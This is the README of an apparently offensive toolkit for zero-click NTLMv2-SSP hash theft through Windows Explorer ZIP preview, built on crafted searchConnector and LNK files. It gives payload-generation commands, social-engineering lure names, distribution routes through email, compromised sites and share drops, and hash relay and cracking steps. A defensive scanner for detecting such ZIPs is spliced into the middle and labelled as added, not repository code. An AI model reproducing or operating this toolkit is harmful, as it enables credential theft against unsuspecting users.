# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
### 🎥 Demonstration POC + March 2025 Patch bypass
[Demonstration video](https://www.youtube.com/watch?v=_NJ3jqU-wdk)
<div>
### 🎥 patch bypass
[Patch bypass video](https://www.youtube.com/watch?v=Btib3LBvpq8)
</div>
> *Click the links above to watch the vulnerability demonstration*
<h2>📋 Technical Overview</h2>
This repository provides a comprehensive research framework analyzing the vulnerability chain in Windows Shell file format processing that leads to NTLMv2-SSP credential disclosure. The toolkit implements two distinct attack vectors that exploit automatic UNC path resolution during file preview operations in Windows Explorer.
### Core Vulnerability Mechanism
The fundamental security issue resides in Windows Shell's automatic processing of embedded UNC paths within specific file formats during preview operations. When users open ZIP archives containing specially crafted files, Windows Explorer automatically resolves UNC paths without user consent, initiating SMB authentication attempts and exposing NTLMv2-SSP hashes to attacker-controlled servers.
### Attack Surface Components
- **File Format Parsing**: Windows Shell automatic processing of XML-based shell files and LNK shortcut properties
- **ZIP Container Bypass**: Archive preview functionality that circumvents Mark-of-the-Web (MOTW) protections
- **Authentication Trigger**: Automatic UNC resolution during metadata extraction and icon fetching operations
## 🏗️ Architecture Evolution
### 🔰 Phase 1: SearchConnector-based Disclosure (CVE-2025-24054)
**File:** `ntml-disclosure-poc.py`
This initial implementation exploits Windows Search Connector (.searchConnector-ms) files, which are XML-based configuration files that define search locations for Windows Explorer. The vulnerability triggers when Windows automatically processes the embedded UNC path in the `simpleLocation` element during ZIP archive preview operations.
**Technical Characteristics:**
- XML-based payload structure following Microsoft schema specifications
- UNC path embedding in `searchConnectorDescription` elements
- Automatic processing by Windows Search Indexer and Explorer shell
- Bypasses traditional file execution restrictions
### 🔰 Phase 2: LNK-in-ZIP Bypass (CVE-2025-50154 / CVE-2025-59214)
**File:** `patch_bypass.ps1`
This enhanced technique addresses Microsoft's initial patch by leveraging LNK file properties. The attack exploits Windows Explorer's behavior of fetching icon metadata and resolving target paths during ZIP file preview, while maintaining the zero-click exploitation vector through careful property configuration.
**Technical Characteristics:**
- LNK files with UNC paths in `TargetPath` property
- Local icon references to bypass initial detection mechanisms
- Windows Shell automatic property extraction during preview
- Maintains file format legitimacy while achieving UNC resolution
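Both vectors described above leave a static artifact inside the ZIP that can be inspected before the archive is ever opened in Explorer: a `.searchConnector-ms` member whose `simpleLocation` element carries a UNC path, or a `.lnk` member that embeds a UNC string. The scanner below is an added example for defenders (mail gateways, sandboxes, triage scripts), not code from this repository; it reads each member in memory without extracting anything. The fixture it builds is constructed for the test: the address 203.0.113.10, the member names and the LNK-like blob (a valid Shell Link header followed by padding and a UTF-16LE string) are made up and are not output of the repository's scripts.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET

# UNC prefix \\host\share, in ASCII and in UTF-16LE (the encoding LNK string data usually uses).
UNC_ASCII = re.compile(rb'\\\\[\w.\-]+\\[^\\\x00"<>|\r\n]+')
UNC_UTF16 = re.compile(rb'\\\x00\\\x00(?:[\w.\-]\x00)+\\\x00(?:[^\\\x00]\x00)+')
# Shell Link header: HeaderSize 0x4C followed by LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex('4c000000' '0114020000000000c000000000000046')

def unc_in_search_connector(data: bytes) -> list:
    """UNC paths under any simpleLocation element of a .searchConnector-ms XML body."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []
    return [(e.text or '').strip() for loc in root.iter()
            if loc.tag.rsplit('}', 1)[-1] == 'simpleLocation'
            for e in loc.iter() if (e.text or '').strip().startswith('\\\\')]

def unc_in_lnk(data: bytes) -> list:
    """\\host\share strings embedded in a Shell Link file, whichever encoding they use."""
    if not data.startswith(LNK_MAGIC):
        return []
    return ([m.group(0).decode('ascii', 'replace') for m in UNC_ASCII.finditer(data)]
            + [m.group(0).decode('utf-16-le', 'replace') for m in UNC_UTF16.finditer(data)])

def scan_zip(zip_bytes: bytes) -> dict:
    """Read each member in memory (nothing is extracted) and map member name -> UNC hits."""
    parsers = {'.searchconnector-ms': unc_in_search_connector, '.lnk': unc_in_lnk}
    hits = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            ext = '.' + info.filename.lower().rsplit('.', 1)[-1]
            if ext in parsers and info.file_size < 1_000_000:   # both payload types are tiny
                paths = parsers[ext](zf.read(info))
                if paths:
                    hits[info.filename] = paths
    return hits

def build_sample_zip() -> bytes:
    """Constructed fixture, not output of the repository's scripts: one XML file, one LNK-like blob."""
    xml = (b'<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">'
           b'<simpleLocation><url>\\\\203.0.113.10\\share</url></simpleLocation></searchConnectorDescription>')
    lnk = LNK_MAGIC + b'\x00' * 60 + '\\\\203.0.113.10\\docs\\report.xlsx'.encode('utf-16-le')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('Project/Project.searchConnector-ms', xml)
        zf.writestr('Project/Salary_Report.lnk', lnk)
    return buf.getvalue()
```

A non-empty result from `scan_zip` is a reason to quarantine the archive; the check is cheap enough to run on every inbound ZIP.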
### 🔧 Prerequisites
<details>
<summary>For Python PoC:</summary>
* Python `3.6+`
* Required packages: `colorama`
</details>
<details>
<summary>For PowerShell PoC:</summary>
* Windows PowerShell `5.1+`
* Execution Policy: `Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser`
</details>
<hr>
### 🔰 Phase 1: Python Implementation (CVE-2025-24054)
```bash
# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
```
Example output:
```
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
```
**Parameters**
- `target` (required): Target IP address or hostname
- `-o`, `--output`: Custom output filename for the ZIP package
### 🔰 Phase 2: PowerShell Bypass (CVE-2025-50154/59214)
```powershell
# Basic usage - LNK file auto-removed
.\patch_bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\patch_bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\patch_bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure "FileName" -KeepLnk
# Specify output directory
.\patch_bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
```
**Parameters**
- `-IP` (required): Target SMB server IP address
- `-Share`: SMB share name (default: `share`)
- `-File`: Target filename (default: `payload.exe`)
- `-Lure`: Social engineering filename (default: `Your_File_For_Payload_Here`)
- `-OutDir`: Output directory (default: current directory)
- `-KeepLnk`: Preserve the LNK file after ZIP creation
<table>
<thead>
<tr>
<th>Vector</th>
<th>Trigger Mechanism</th>
<th>User Interaction</th>
<th>Patch Status</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>🔗 SearchConnector</strong></td>
<td>XML parsing + UNC resolution</td>
<td>ZIP open</td>
<td>🛡️ Patched</td>
</tr>
<tr>
<td><strong>📎 LNK TargetPath</strong></td>
<td>Icon metadata fetch</td>
<td>ZIP open</td>
<td>🔴 Active</td>
</tr>
</tbody>
</table>
```mermaid
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc
```
### 🔧 Technical Specifications
1. 📦 Payload Generation
   - Create malicious file (SearchConnector/LNK) with UNC path
   - Package in ZIP archive with enticing name
2. 📤 Delivery
   - Distribute ZIP via email/web/download
3. 💥 Exploitation
   - Victim opens ZIP in Windows Explorer
   - Automatic file preview triggers UNC resolution
   - NTLMv2-SSP hash transmitted to attacker
4. 🎭 Post-Exploitation
   - Hash capture and relay attacks
   - Password cracking attempts
<hr>
### 💀 Deployment Scenarios
<b>📨 Scenario 1: Direct ZIP Distribution</b>
```powershell
# Create ZIP payload
.\patch_bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
```
<b>🔄 Scenario 2: LNK File Transfer</b>
```powershell
# Create and preserve LNK file for multi-host deployment
.\patch_bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
Copy-Item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
```
<b>🎯 Scenario 3: Targeted Social Engineering</b>
```powershell
.\patch_bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
```
<h2 align="center">Contact the Developer</h2>
- Group & Contact: t.me/initial_persistence
- Email: tylerblackout17@gmail.com